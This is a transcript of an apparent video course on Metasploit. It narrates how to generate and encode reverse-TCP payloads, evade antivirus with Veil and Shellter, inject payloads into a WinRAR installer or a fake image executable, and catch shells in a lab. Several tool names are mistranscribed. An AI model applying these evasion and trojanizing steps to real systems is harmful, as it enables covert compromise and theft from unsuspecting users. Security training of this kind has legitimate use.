thing you can do is change the banner of Metasploit. So you can see, for example, this, you can change it by typing banner. Here we go. Let me maximize this a little bit. Banner, and you can see that the banner has been changed. So the first command I'm going to use, or the first thing I'm going to use it, is show exploit. So show exploit will show me all the ready exploit that I can use it against any vulnerable operating system. So I'm going to type show exploits, and I'm going to wait a little bit because the database is large, so it will take some time. So as you can see, here is all the ready exploits that you can use it, but of course I'm not gonna check one by one because it's very large. It has, as I said before, more than 1,600 exploits. And let me maximize this a little bit. Okay, if you go to the top, you will see, just a minute. Okay, if you go to the top, you can see the description of the exploit. You can see the rank. We have excellent, great, normal, good, and the name of the exploit. So I'm not gonna check all of these exploits until I see the exploit that I'm gonna use it. I'm gonna use a command called search. So search will specify my exploit that I'm searching for. So if I type search -h or the help menu, you can see all of these things that you can, or all of this command that you can use it in order to get the exploit. In my case, I use search. Let's say, for example, now we are going to check I'm going to get a payload called reverse TCP, which is the most popular payload. So I'm gonna say search, then I'm gonna specify the type, The type is going to be payload. So I'm searching for payload. I'm not searching for exploit, and I'm gonna give it a name, or it's like keyword. I'm gonna say reverse TCP, and we have also the platform. You can select from Windows, Linux, OS X. So I'm gonna say Windows, and as you can see, I have got all of this payload that I can use it with Windows. So we have all of these payloads. Of course, if you put more keywords, you will get what you are looking for. In my case, I'm looking for Windows Metasploit reverse TCP. Okay, so here is it. So if I want to use this payload, I can copy it, and I can see the rank is normal, and I can read the description: Windows Metasploit reflective injection. So if I want to use this payload, I'm gonna say use. So this command will use the exploit or the payload or the auxiliary that I'm looking for. Now I'm going to pass the payload. I'm gonna say enter, and now I'm gonna see the options that reverse TCP provides me. I'm gonna say show options in order to see the options. So here we have the L port that we want to set. You can change it by typing set L port. Then you can type, for example, let's say 1234. If I type show options again, I can see that the port has been changed. And if I want to set the L host, let's say I'm gonna say set L host 192.168.1.3, just for example, and I can see that the L host has been changed. What if I want to unset this L host and put another one? So I can set L host and type another IP address. So if I type show options again, I can see that it has been changed. Or I can use unset and type L host and enter, and you can see that now we don't have L host, so it's empty. So if I want to run this payload or this exploit, let me set it again. If I want to run this reverse TCP, just I can type run or exploit. But for now, okay, exploit. I cannot use it because I'm not using a multi-handler. I'm gonna talk about all of this later. So let me back from here, just type back, and you will come back to MSF console. So I'm gonna say right now show auxiliaries. So the auxiliaries will help me to, it will help me to get some information about the target, scan the open ports, see which operating system the target is using, and more. So I'm gonna say show auxiliary, and it's gonna take some time to give us all the auxiliaries. And here is it, all the auxiliaries that we can use in order to get some information about the target, whether it's open ports, operating system, or fuzzing, sniffing, and more. So the next thing is we have also show payloads, and I did that before, which is the payload or the thing or the code that you have to execute it in the target computer, and it will give you a reverse connection. So I'm going to say show payloads, and here's all the payloads that I can use it. And I explained how you can specify your payload by typing search and put the keywords, platform, and the type, like etc. And also we have something, there is another command. So I'm gonna show you one thing. If you typed help, you will get the command that you can use in Metasploit. you can read all of this. So this will help you a lot. And there is one thing, if you want to check whether you are connected to the database or not, so you can type DB status, and as you can see, Postgres connected to Metasploit framework. And also you can execute nmap within Metasploit by typing db nmap, then the option that you can use. So let's say db nmap -h, and you can get all the options that you can use within Metasploit in order to get some information or gather some information about the target computer. I'm gonna type help again, and we have something called credential, and it will list all the credentials of the database if you have any credentials. And you can disconnect from the database from here or export the database. Okay. So you can type also version, and it will show you the version of Metasploit framework and the console version of the console of Metasploit. And what we have as well, you can use show -h, and it will show you like you can run show plugins, auxiliary, payloads, and I did that before, encoders, etc. So you are going to apply what you learned from this video in the future videos, because we are going to use all of these commands more and more often. So this is gonna be easier for you. And as I said, you can type help command, and it will show you the command that you can use and the description. And we are going to use almost all of these commands, or not all of it. We are going to use the most important commands from this list. So you can, if you want to exit from Metasploit, you can type just exit -y, and now you are out. And if you want to stop the database, you can type, as we did before, msfdb stop, and it will stop the database. This was an overview of Metasploit, shows you what is Metasploit and what it does, and the most important commands that you can use in Metasploit. And we use MSF console interface in order to deal with Metasploit, and you don't have to worry about the command that we use in this video. It's very simple, it's very easy. We are going to use it more often in the future videos. And just keep in mind these three concepts. The first one is the payload, which is the thing or the code that you have to execute it in the target computer in order to get a reverse connection. And the exploit is, or the ready exploit is, the exploit that you are going to execute it on the vulnerable operating system, so you can hack him remotely. And the auxiliaries is the tools that you can use it in order to get some information about the target computer or the target machine, check the open ports, fuzzing, sniffing, etc. Creating a payload using MSF Venom. In this video, I will show you how to create a payload using MSF Venom tool, which is part from Metasploit framework. But before we do that, I'm going to talk about MSF Venom, how they created. So before creating MSF Venom, there were two tools comes with Metasploit framework as a part of it. And the first tool called MSF Payload, and MSF Payload is used to generate and output all of the various types of shellcode that are available in Metasploit. And as I mentioned in the previous video, the payload is the shell or the code that you are going to execute it in the target operating system in order to get a reverse connection. And the second tool called MSF Encode, and it's used to encode the generated payload by MSF Payload in order to make the payload undetectable from the antiviruses. But since 8th of June 2015, Metasploit framework team has created another tool called MSF Venom, and MSF Venom is a combination of MSF Payload and MSF Encode, putting both of these tools into a single framework instance. So that means that we can generate a payload and encode this payload at the same time using MSF Venom. So in this video, I'm going to show you how to create a payload using MSF Venom, and in the next video, I'm going to show you how to encode the generated payload by MSF Payload. So now let's see how we can do that. Okay, so the first thing, I'm going to open a new terminal, and I'm going to type MSF Venom -h to see all the options that MSF Venom provides us. Okay, so here we have a lot of commands. I'm not gonna use all of these commands. I'm gonna use the most important command to create a payload. So for example, we have -p to specify the payload that you want to create it. For example, we are gonna create reverse TCP payload, and we have -f, which is the format, whether it's exe, VPS, etc. And -a to specify the arch. For example, between 64-bit or 32-bit. And you have also the platform to specify the platform. It's not important because you're gonna type -p Windows Media Player reverse TCP. So it's only to specify the platform, whether it's Windows, Mac OS X, or Linux. And also we have -o, which is the output. So where do you want to save it? Let's say in root directory or on your desktop. This is up to you. So I'm gonna say clear, and I'm gonna create reverse TCP payload. So I'm gonna type msf venom, then I'm gonna specify the payload, which is Windows meter printer reverse TCP. Then I'm gonna specify the arch, which is 64-bit. And one thing I want to mention, that is the payload is 32-bit. In order to create 64-bit or reverse TCP that supports 64-bit, just type x64 / so it's gonna be Windows x64 Meterpreter reverse TCP. Then the arch is 64. If you want to create 32-bit payload, just remove the x64 and leave it like this, and say for example x86 just to make it 32-bit. But in my case, I'm gonna say 64-bit, and I'm gonna add x64. And we have also the L port, so you can choose any port you want, but in my case I'm gonna say 8080 because this port is unsuspicious against the firewalls. And also we have the L port, or the L host, which is your IP address. You can type your internal IP address if you want to hack in your network, and if you want to hack out of your network, you can specify your public IP address. And I'm gonna create a specific or there will be a specific section talks about how to hack Windows operating system that are out of your network, so you don't have to worry. So I'm gonna get my IP address, or my internal IP address. I'm gonna open a new terminal and type ifconfig. Then I'll see my internal IP address. So I'm gonna paste it here, and I'm gonna specify the format, which is exe. And we have also, okay, so I'm gonna save it by putting this symbol, and I'm gonna save it on my desktop, root desktop, and I'm gonna call it payload.exe. Then I'm gonna press enter. And as you can see, we have created this payload. I'm gonna press on it and go to properties and see the size of this payload. As you can see, it's 7.2 kilobytes, so it's very wide. It's not too big. And so this payload that we have created is not encrypted. In the next video, I'm gonna show you how to create an encrypted or 50% encrypted payload using MSF Venom, and this is by using the encoders. So we have Shikadaganai, which is the most popular encoder that used to encode Metasploit payloads. And but I tried before, and it's not very powerful. It's not 100% encrypted, and Bitdefender will be able to detect the payload. But because this is Metasploit course, I have to show you MSF Venom, how to create payload and how to encode it. So here we have create payload. In the next video, I'm going to show how to create an encrypted or 50% encrypted payload. After learning how we can generate a payload using MSF Venom, in this video you will learn how to encode this payload. The main purpose of encoding the payload is to make it undetectable against the antiviruses that installed on the target operating system. So we are going to use an encoder called Shikadaganai, which is the best and the most popular encoder that will encrypt your payload. So first you'll learn how to generate 32-bit payload. Then how to generate 64-bit payload, because 32-bit payload doesn't work on 64-bit Windows operating system. So let's see how we can do that. Okay, so to create an encrypted payload, just open new terminal and type msf venom -f again, -h I mean. So here's all the options. We're gonna use the option -e to specify the encoder, and we're gonna use the encoder Shikadaganai because it's the most popular and the most powerful encoder. And also we have -p, which is the bad characters, and here we have x00, xff are like the most popular or the most famous bad characters. And also we have -i, which is the iteration, so how many times you want to encrypt your payload. Okay, so I'm gonna type msf venom, then I'm gonna specify the arch, which is 64, then the payload Windows x64 meter pritter reverse TCP, then the L port, which is 8080 because it's not suspicious, and the L host, you can put your public IP address or your internal IP address. And as I said before, I'm gonna create a specific section talks about how to hack Windows operating systems that are out of your network. So for now I'm gonna add my internal IP address, then the format is exe, and we have also now we are gonna specify the encoders. So -e, I'm gonna say or let me first list all the encoders. So I'm gonna type msf venom -h first, then let's see here, -e -l. Okay, so msf venom -l encoders to list all the encoders. And here we have all the encoders that we can use. You can see the name of the encoder and the rank and the description. The best encoders are CMD PowerShell base 64, which is excellent, and we have Shikadaganai. It has also excellent rank. So we're gonna use Shikadaganai encoder. Then I'm gonna close this window and open this window again, and I'm gonna paste the encoder here. And I'm gonna say -i, so how many times I want to encode my my payload. I'm gonna say 3 times for now, and also I'm gonna add -p, which is the bad characters, and I'm gonna use these bad characters and paste it here. Okay, so and I'm gonna save it on my desktop and call it encoded .exe. So I'm gonna repeat this command. msf venom is the name of the tool, and -a is the arch. So we have 64-bit, and the payload that I'm gonna use is reverse TCP 64-bit, and the L port is 8080, and the L host is my IP address, whether it's my internal IP address or my public IP address, and the format is exe, and we're gonna use an encoder called Shikadaganai, and you can see here that it's 64 or 86. That's means 32-bit. So 32-bit encoder does work on 64-bit payload, so it's not gonna be a problem. I'm gonna encode my payloads 3 times, so iteration 3, and the bad characters are these bad characters just because it's the most popular bad characters. And I'm gonna save it on my desktop, and I'm gonna call it encoded.exe. So I'm gonna press enter for now. And here we have created the encoded payload. You can see here that it's encrypted 3 times, and let me check the size. It's 7.2, so it's the same. So as I said before, this payload is not going to be encrypted 100%. So Bitdefender will be able to detect this payload. But in the next videos, I'm gonna show you how to encode your payload 100%, and this is by using more than tool and more than method, and how to embed it with other programs. So we learned how MSF Venom works, how to generate a normal payload, and how to encode, or how to generate an encoded payload, whether it's 32-bit or 64-bit, and how we can use the encoders and the iteration and the bad characters. In the previous video, we've seen how to generate an encoded payload using MSF Venom. So in this video, I'm going to test the encoded payload that we have created, and I'm going to test another encoded payload has been generated by another software just to compare the encryption. But before we do all of that, you must set a listener to listen for the incoming connection to get a reverse connection from the target machine once he runs the payload that we have created. And to do that, we should specify the payload that we use it when we were creating our payload, and set the L port and the L host. After that, we will run the listener and you will wait for a reverse connection. So let's see how we can do that. Okay, so here we have the encoded payload that we have encoded using Shikata-Ganai encoder, and the second payload, or the second encoded payload, has been generated by another software called Vision. So I'm going to talk about how to generate this encoded payload in the next videos, but for now I'm going to test the payload that I have created, or the payload that I have generated. The first one by has been encoded by Shikata-Ganai encoder, and the second one has been generated and encoded by Vision framework. So I did that, or I generated the Vision payload just to compare the encryption and see which one is stronger than the other. So first thing I'm gonna do is I'm gonna copy the first payload and the second payload to my web server. So I'm gonna enable my web server first by typing service. Then I'm gonna type Apache to start, and now my Apache server is ready to use, and you can download from my Kali Linux web server. So I'm gonna go to my desktop, so cd desktop, and I'm gonna copy the encoded payload that we have encoded using Shikata-Ganai payload encoder, and I'm gonna copy val.exe to my web server, which is var www html, and then I'm gonna press enter. So I'm gonna check to see whether my payload has been copied to my web server by typing cd var www html, which is the full path of my web server. So I'm gonna press enter and ls, and as you can see here, we have my encoded the payload that I have copied to my web server. So the second thing I'm gonna do is I'm gonna set a listener to listen for the incoming connections. So first I'm gonna run Metasploit, and to run Metasploit you have to initialize the database of Metasploit, and we did that before. This is by using service PostgreSQL, then start, and after that type MSF console to deal with Metasploit using MSF console interface. So to set a listener, just type use exploit multi-handler, and then we're going to specify the payload by typing set payload windows meter reverse. So this is the payload that we have used it when we were creating our payload, which is reverse TCP. So both of these payloads are reverse TCP payloads. So after that, I'm gonna specify the L port and the L host, but before we do that, I'm gonna type show options to see the available options that I have to set it. So here we have the L port. I'm gonna change to 8080 because, as I said before, 8080 is not suspicious against the firewalls. So I'm gonna type L port, then I'm gonna add 8080. Then I'm gonna add my IP address by typing set L host, which is my IP address. So 192.168.233.131, and I can make sure by typing ifconfig. As you can see, here's my IP address 192.168.233.131. So I'm gonna type clear and show options again. And as you can see here, we have the L host is my IP address, and in the L port is the port that we have specified in our payload that we were when we were generating our payload. And yeah, here's the L port. So I'm gonna type run and wait for incoming connections. So I will go to my Windows machine and open Edge browser. Then I'm gonna enter my IP address, which is this one. I'm gonna press enter, and I can see both of the payload that are in my web server in Kali Linux. So I'm gonna start with the encoded.exe that has been encoded using a Shikadaganai encoder. So as you can see here, I have Malwarebytes program and I have Bitdefender. So I'm gonna download the first one. I'm gonna say save, and it has been downloaded. I'm gonna try to run it. Here it's telling me that it's executable, and I'm gonna say run. And as you can see, Malwarebytes was able to detect this payload and say that it's a Trojan or malware. I'm gonna say close, and it has been deleted. I'm gonna try the second payload, or the second payload, and I'm gonna press on it and download it on my Windows. I'm gonna say save, and it has been downloaded. Let me try to run it. So double click on it, and it's gonna tell me that it's executable. So run. So Bitdefender, so this payload was able to bypass Bitdefender and Malwarebytes programs. So I'm gonna come back to my Kali Linux, and I can see that there is a Metasploit session is open, and I can control the target computer from Metasploit command line. So if I type sysinfo, you can see the system information. If I typed help, you can see all the command that you can use in order to control the target computer, and I'm going to talk about this in the next videos. So we learned how to set a listener to listen for the incoming connections, and we tested the payload in the target computer, and we saw that the VAI framework is better than the encoder that comes with MSF Venom. And in the next video, I'm going to show you how to, or in the next videos, I'm going to show you how to encode your payload using modern method to bypass almost all the antiviruses. In this section, you will learn how to generate and encode a payload using modern tool, and how to make your payload unsuspicious. So we will start first by installing Veil Evasion framework that used to generate an encoded payload from almost all the antiviruses. Then I'm going to show you how to use Veil framework to generate an undetectable payload. And after that, you will move to learn how to backdoor an executable file with your payload, and this is to make your payload less suspicious. Then I'm going a step further and show you how to backdoor any type of file, whether it's image, MP3 or PDF, etc. And lastly, you'll learn how to spoof any file extension to any extension you want, and this by using a simple trick allows you to do that. So if you faced any issue during practicing what you have learned, please post your question in Q&A section or send me a direct message and I'll be happy to respond. In this lecture, I'm going to start with the first tool that allows us to bypass the antiviruses, which is Veil framework. Veil is a tool designed to generate Metasploit payloads to bypass the antiviruses. And I will repeat again that the payload is the code or the program that will give us a full control over the target computer once the target executed on his computer. So this tool will make your payload undetectable and unsuspicious from almost all the antiviruses. For now, we are going to start with installing Veil framework on our Kali machine, and in the next video, I'm going to show you how to use it to encrypt your payload. Before installing Veil Evasion framework on your Kali Linux, you must update your sources list in order to get the last version of Veil Evasion. So to do that, go and open a new terminal and type apt-get update. So I have already updated my sources list, so it's not going to take a long time. Then you are going to type apt-get upgrade to upgrade all the programs and tools that is in your Kali Linux machine. So I'm not going to do that because it's going to take a long time. So to install while evasion, just type apt-get install while evasion. Then I'm going to press enter. So it's going to ask me to install all of these tools and programs. So I'm going to say Y, which is yes. Then I'm going to wait. Okay, so after installing while evasion, just type clear and type while evasion again to install all the programs or all the tools that are missing. So it's asking you for, are you sure you want to install while evasion? There is yes and no and silent. In my case, I'm going to say silent because this is easier for me, so I don't have to click on next all the time to install all the packages. So I'm going to say yes for silent, and I'm going to press enter, and everything will be installed automatically and I don't have to do anything. Then I'm going to run it without having any issues. Okay, so while evasion has been installed, it took about 30 minutes to download and install Calendix on my Calendar machine. I'm gonna test while evasion right now to see if it's work or not. So I'm gonna type while evasion and I'm gonna press enter. And as you can see, while evasion works and it does work without any issues. So in the next video, I'm gonna show you how to generate an encoded payload using while evasion, because I mean, it's better than the encoder that comes with MSF Venom. So it's gonna bypass almost all the antiviruses, and generating the payload will be quicker and easier than MSF Venom, and we will see this in the next video. After learning how to install While framework on your Kali machine, in this video you'll learn how to create an undetectable payload using While evasion. And as I said before, while evasion is a tool designed to generate Metasploit payloads that bypass the antiviruses. So by using while evasion framework, we will be able to generate an undetectable payload, and it's going to be encrypted from almost all the antiviruses. And while framework allows us to combine a certain exe file with our payload, and I will talk about this in the next video. So for now, I will create a reverse TCP payload using while framework, and I'm going to test it in the target computer to see whether it's worked or not. So let's see how we can do that. Okay, so to run while evasion framework, go and open your terminal, then type while evasion, then press enter. So here you can see all the available commands. We are going to use list to list all the available payloads, and I'm going to generate a reverse TCP payload. Here's it, number 6. So I'm going to type 6. Then I'm going to press enter, and now I'm going to specify the L host and the L port. So I'm going to set L port is 8080 because it's unsuspicious, and the L host, by typing L host, is my IP address. Then I'm going to press enter, and if I typed info again, I can see the payload that I used or I chose. And I can see the L host and the L port, and now I'm gonna generate the payload. And now it asks me to choose a name for this payload. I'm gonna say, for example, WinRAR. Then I'm gonna press enter. And here you can see the full path of the generated payload. So I'm gonna copy it. And you can see the L port that we specified, and the L host, and the name or the payload. So I have copied the full path of the payload. I'm gonna say Ctrl C, and I'm gonna say CP to copy the generated payload, and I'm gonna copy it on my desktop. And as you can see here, the payload that we have generated. Let me clear. And now I'm gonna send this payload to the target computer, but before we do that, I'm gonna upload, or I'm gonna put this payload on my web server to download it from the target browser by typing my IP address. So to enable the web server, just go and type service Apache 2 start. Now I'm gonna copy the generated payload from my desktop to my web server folder. So I'm gonna say cd desktop to enter my desktop, and I'm gonna say cp to copy, and WinRAR in the name of the generated payload. Then I'm gonna put the full path of my web server folder. So it's in var www html. Then I'm gonna press enter. So if I go to the path cd var www html, I can see my payload here. I'm gonna say ls, and as you can see, here's my payload. I'm gonna delete the other payload because just to make the things easier. So rmrf kill, which is the name of the payload. And now as you can see, here's the payload that we have generated, and it's in our web server folder. So another thing we need to do is to set a listener, as we did in the previous videos. So I'm gonna say cd, and I'm gonna initialize my Metasploit database by typing service PostgreSQL. Then I'm gonna say start. And now I'm gonna run Metasploit framework, and this is by using the command msf console, which is the interface of Metasploit. So to set the listener, just type use exploit multi-handler. And now I'm going to specify the payload that we used when we were generating our payload, which is reverse TCP. So I'm going to say set payload, then Windows and meter operator reverse TCP. I'm gonna press enter. If I type show options here, let me maximize this window a little bit. So here I can see the payload that I have specified, and I can see the L host is empty and the L port is 444. So I'm gonna specify the L host first, which is my IP address. And the L port is the L port that we used when we were configuring our payload. So I'm gonna say set L port, and I'm gonna say 8080. Now I'm gonna type run, and now our listener is ready. And once the target run the payload that we have created, we will get a reverse connection. So let me go to my target machine and open Edge browser. Then I'm gonna type my IP address to download the payload. Here I can see the payload. I'm gonna press on it. I'm gonna save it right now. Then I will open the folder and run it from here. So in the future videos, I'm gonna show you another delivery method, because of course you're not gonna tell the target go to my IP address and download this file, because I mean of course he's not gonna download it because this is suspicious. So here it's gonna ask me if I wanna run this executable file. I'm gonna say run. Then I will come back to my Linux machine, and I can see that a Metasploit session has been opened on my Metasploit. So if I type sysinfo, I can see the system information 64-bit, and this is the computer name Windows 10 etc. So if you typed help, you can see many commands that you can use, and you will see in the future videos a specific lecture talks about how to use Metasploit command line. So for now, we were able to generate an undetectable payload and send it to the target and test it to see whether it does work or not. So in this future videos, we're going to talk about delivery methods and how to hide and combine your encrypted payload or your encoded payload with other programs just to make it unsuspicious against the antiviruses and against the person that he wanted downloaded. In this lecture, I'm going to show you how to generate an encoded payload backdoored with a certain exe file, and we're going to do that using veil evasion. I will start by generating an encoded payload backdoored with WinRAR program. And the good thing is, when the target runs your payload or your backdoor, you will get a Meterpreter session with the administrator privileges, so you have the full permission to do whatever you want. But the only problem is that the combined exe file is going to be damaged. But you don't have to worry about that, because I'm going to show you in the next lecture how to combine it with a certain exe file and run it without having any issue. And there is several types of payload that you must choose from. Some of them may work and some of them may not work. And some of them may work, but your payload is not going to be encrypted. But in this video, in my case, I chose a payload type able to combine and encode your payload. And one thing I want to mention is that the icon and the size of the payload will be changed to the combined exe file size and icon, which is a good thing. So let's see how we can do that. Okay, so the first thing I'm going to do is I'm going to download the file that I'm going to combine it with my payload. In my case, I'm going to download WinRAR program that used to archive and unarchive files and folders. So I'm going to open my browser and I'm going to download it. Here's it. It's 32-bit and it's English version. I'm going to say save. Okay. And I'm going to close my browser. And the second thing I'm going to do is I'm going to run veil evasion. So I'm going to type veil evasion. Then I'm going to say list to list all the payloads. And I'm going to use a payload called Native Vector Factory. So this payload allows me, or this module allows me to combine a certain exe file with my, or it will generate a certain payload or an encoded payload that combined with a certain exe file. So I'm going to say 18 because it's number 18. Let me maximize this window a little bit. And first thing I'm going to do is I'm going to specify the lhost. So I'm going to say set lhost, then I'm going to put my IP address. Then I'm going to specify the L port, which is the port that I'm going to listen to. And I specified 8080 because it's less suspicious. Then we have here origin.exe, which is the file that I'm going to combine it with the payload or the encoded payload that veil evasion will generated. So I'm going to say set origin.exe, then I'm going to put the full path of the file that I'm going to combine it. So it's en route, downloads, and let me check the name. We have two files. I'm going to delete one. It's called WRAR 540. So I'm going to say WRAR 540.exe and I'm going to press enter. And the last thing I'm going to specify is the payload or the type of the payload. So we have several types of payloads. Some of them may work and some of them may not work. And some of them may work but your payload is not going to be encrypted. I'm going to show you all of these payloads. Here we have, it's about like 9 or 7 payloads. And I tested this one and it does work. So I'm going to copy it. I'm going to minimize this window. Then I'm going to say set payload. Then I'm going to put the type of the payload. Then I'm going to say enter. If I type info again, I can see all the information just to make sure that everything is correct. So here I have my IP address, my Linux IP address, and the L port is the port that I'm going to listen to, and the origin.exe, which is the file that I'm going to combine it with my generated encoded payload. And here we have the type of the payload, and I chose just because it's working. So I'm going to say generate, and then I'm going to press enter. So here I'm going to call it, for example, WinRAR, or I'm going to call it WRAR. Yeah, WRAR. Then I'm going to say enter. And here is the full path of the encoded payload. I'm going to copy it. And let me clear. I'm gonna put it on my desktop. So I'm gonna put the full path, then I'm gonna say root desktop, enter. And here is the encoded payload and that generated or that combined. So this payload is combined with the WinRAR program. I'm gonna put it on my web server. So I'm gonna say copy from the path, and I'm gonna put it on my web server, which is located on var www html. I'm gonna press enter. Let me check to see whether my payload is there or not. So I'm going to computer var www html, and here is it. Now I'm going to, or let me set a listener first. So I'm gonna run MSF console to deal with Metasploit. Then I'm gonna set the listener, and I'm going to specify the payload, which is shell reverse DCP, and I'm gonna show you this. Then the L port and the L host. So first I'm gonna say use exploit multi-handler. Then I'm gonna say set payload Windows shell reverse TCP, because this is the type of the payload that I used when I was generating the combined payload. So I'm gonna say show options to see all the options. I'm gonna put my L port 8080 that we specified when we were creating the payload, and set L host, which is my Cal Linux IP address 150. Then I'm gonna say run, and my listener is working. I'm going right now to the target machine. I'm gonna open Google Chrome. Then I'm gonna put the IP address of my Cal Linux. So 192.168.233.150. I'm gonna press enter, and here is it. I'm gonna download it right now. Here is it. Show in folder. Let me delete all of this. I'm gonna close this. Okay, so I'm gonna run it. So as you can see here is just more info run anyway. Yeah, yes. And as you can see, WinRAR, the installer does work, but the problem is whenever I click on extract, it's not gonna work because the file or the format is damaged. So there is problem, but you don't have to worry about this, because I'm gonna show you in the next video how to combine a certain exe file with your payload without having any issues. This video is just to show you how to use ViolaVision to combine a certain exe file with an encoded payload. So I will come back to my Cal Linux, and as you can see, I can see Windows shell command prompt. So I can type ls, or I can type dir, or I can make directories or anything I want. So I'm gonna say who am I. As you can see, here's all the information. So we learned from this video how to use ViolaVision to combine a certain exe file with your encoded payload, or generate an encoded payload combined with a certain exe file. And in the next video, I'm going to show you how to generate an encoded payload combined with a certain exe file without having any issue. And I think this tool is going to be better. In the previous video, we seen how to combine an executable file with your payload. But there was one problem, is that once your target runs your backdoor, everything will work and everything will be normal, but the problem is the file will be damaged. But in this lecture, I'm going to show you another tool allows you to generate an encoded payload combined with another exe file, and it's going to work perfectly without any issues. The tool that we are going to use is called Shelter. Shelter is a dynamic shellcode injection tool. It can be used in order to inject shellcode into native Windows applications. So first I'm going to show you how to download and install Shelter on your Kali machine. Then I'm going to show you how to use it. Okay, so the first thing I'm going to do is I'm going to download Shelter tool on my Kali Linux. So I will download it from the official website, and I will put the link in the resources list. So shellproject.com. Then I will download it from here. I will click on shelter VI, save, OK, and I will close my browser. Let me open download folder. Then I'm gonna extract shelter, and I'm gonna drag it and drop it on my desktop. Here is it, and I'm gonna close this window. So here I have WinRAR that I'm going to inject my payload into it, and shelter is the tool that I'm gonna use to inject the payload into WinRAR. So I'm gonna open new terminal, and I'm going to my desktop to run a shelter tool. Then cd shelter ls, and I can see the tool name shelter.exe. I'm gonna run it using WAN tool because it's an exe, or it ends with exe extension, so I have to run it using WAN tool. Here it's asking for the operation mode. I'm gonna say auto, and the PE target is the file that we are going to inject your payload into it. And here we have WinRAR. I'm gonna put the full path of the file that I'm gonna inject my payload into it. So it's in my root desktop wrar 540.exe, enter. Then I'm gonna wait a little bit. And here it's asking whether I want to enable stealth mode or not. And stealth mode basically is preserves the original functionality of the file. So I'm gonna say yes, Y. Then it's asking for whether I want to use it from the listed payload or custom one. I'm gonna say listed by typing L, and I'm gonna select number 1, Metasploit reverse TCP. I'm gonna press enter. Then I'm gonna put my Linux IP address, then the L port 8080. Then I'm gonna wait a little bit. And as you can see, we have successfully injected our payload into WinRAR program. I'm gonna test it right now, but before I do that, we must set a listener to listen for the incoming connections. So I'm gonna say MSF console. Then I'm gonna say use exploit multi-handler as we did in the previous video. Then I'm gonna set the payload that we used, which is Windows Metasploit reverse TCP. Then I'm gonna say show options, and I'm gonna specify my L port, or the L port, and the L host, which is my IP address 150. Then I'm gonna say run. Now I'm gonna copy the injected file to my web server, var www html, and I'm gonna paste it here. Now I'll come back to my Windows machine and I'll test it. I'm gonna open my browser, then I'm going to call Linux IP address. Then I will download the file. Show in folder. And here is it. As you can see, it had the same size and the same icon of WinRAR, so nothing suspicious. I'm gonna double click on it. More info, run anyway. Then I'm gonna say yes. And as you can see, WinRAR does work and is not damaged. I will come back to my Linux machine and I can see a Metasploit session is opened. So I can type sysinfo and it will give me the system information. And one good thing is that you have the administrator privileges. So if I typed get UID, just let me get system first. You can see here in memory I'm an admin. I'm gonna say get UID again, and as you can see, authority system. So we learned how to combine a certain exe file or how to inject a payload into an exe file and run it without having any issues. So far we've seen how to backdoor any exe file using two methods. The first one is by using val evasion, and the second one is by using shelter tool. In this lecture, I'm going one step further, and this is by backdooring any type of file with your payload. And to do that, first we are going to convert any type of file to an executable, then we will combine this executable file with a payload using val evasion or shelter. And after all of that, you can change the icon of the backdoored file to anything you want. For example, if you backdoored a PDF file, you should change the icon of the PDF file to PDF icon. And this will make your payload less suspicious. And we're gonna do that using a program called AutoWit. And all the links will be in the resources list. So let's see how we can do that. Okay, so first I'm gonna download AutoWit program from the official website. You can go to the official website. It's called autowitscript.com. You can see all the links in the description. Just scroll down and click on download AutoWit. In my case, I have already downloaded AutoWit program and it's in my downloads folder. And you are going to download another file called executefile.au3, which is AutoWit. And this file allows you to combine a certain, you can combine JPG or MP3 or PDF or whatever you want. So you are going to use the script. Okay, so for now, what I'm going to install I'm going to install AutoWit program on my Cal Linux. Let me open new terminal. Then I will go to my downloads folder, then ls, and because this is an executable file, I'm going to use wine. Then I'm going to put the full name of the file. And I'm going to press enter. I have already downloaded AutoWit program, but I'm going to overwrite it. So next, I agree, overwrite current version, next, install. Okay, I will uncheck this box, then finish. And the next step is to search for a certain photo, MP3 file, PDF, or anything, and get the direct URL of it. So I'm gonna give you an example. I'm gonna combine a JPG image with, or I'm gonna convert first the JPG image to an exe file. So I will search for the image. Let me type wallpaper just for example. Then I'm going to image, and let me select this photo. And I will take the direct URL. So I'm going to the official website. I will search for this photo. And here's it. Like this. Here's it. Click on it. And here is the direct link of the image. I'm gonna copy it. And I'm gonna save this image on my desktop. Because right now I'm gonna convert it to an icon. So I will minimize Firefox and I will come back to my downloads and I will run the script that I have downloaded. Here's it. You can run it using your Notepad or AutoWit program. I'm gonna run it using AutoWit program. And you are gonna change this URL, or let me just type URL. Okay, you are gonna change only the URL to the link of the image that you have copied, which is this one. So I'm gonna copy it. Then I'll come back and I'll put, instead of URL, I'm gonna put the link of the image, or the direct link of the image, or the PDF file, or MP3, or anything you want. So I'm gonna say Ctrl+S to save, then X. And what I'm gonna do right now is I'm gonna combine, or convert the JPG image to an executable. And to do that, I'm gonna use AutoWit program that we have downloaded. I'll go to show application first. Then I'll search for compile. Here is it, compile script to exe. Okay, so here I'm gonna say browse to select the script that I have modified and add, when I added the link to it. Here is it. So open, and it will convert to exe. And here is the name of the file, you can change it. And you can check this box whether the system is 64-bit, but I'm gonna leave it at 32-bit, and I'm gonna select an icon for it. So I will come back to my browser, and I will go to a service called online/convert.com that allows me to convert my image to an icon. So I will go to image converter and convert to icon. Then I'm gonna say browse. Then I'm gonna select the image that I have downloaded. Then convert file. Then it will convert it to an icon. So I'm gonna save it. Then I will come back to my auto program. So I'm gonna say browse, and here is the icon that we have downloaded. Open and convert, and as you can see, conversion complete. So right now everything is done. What I'm gonna do right now, I'm gonna test this executable or this wallpaper in the target machine to see whether it's work or not. So I'm gonna call it wallpaper like this, and I'm gonna put it in my web server folder, which is in var www.html. Then I will paste it here. Let me come back to the target machine. I will open my browser, then I will go to Cal Linux IP address. Then I will download this image just to test it. And as you can see, it looks like a legit image. I mean, you can hear its wallpaper, you can see an icon, you can run it, and it will run without any issues. So run anyway. And you can see, so everything is working. So it's unsuspicious. Let me delete it right now. I'll come back to my Cal Linux machine. I'll put this in my desktop, on my desktop. Then what I'm gonna do is I'm gonna combine this exe file, or I'm not gonna combine, I'm gonna inject a payload or payload code into this exe file, and we're gonna run it in the target machine to get a reverse connection. So we're gonna use shelter tour as we did in the previous video. So I'm going to cd desktop, then I'm going to cd shelter, then ls, and because it's executable, I'm gonna say wine shelter.exe, and the operation mode is gonna be auto, and pe target, which is the full path of this executable image. So I'm gonna say it's in root desktop wallpaper.exe, and I'm gonna press enter. And now it's asking to enable stealth mode, and as I said before, stealth mode preserve the original functionality of the file. So I'm gonna say yes, and I'm gonna say enter, and then I'm gonna say I'm gonna say listed first. I'm gonna use listed payload, so L. Then I'm gonna select the index. 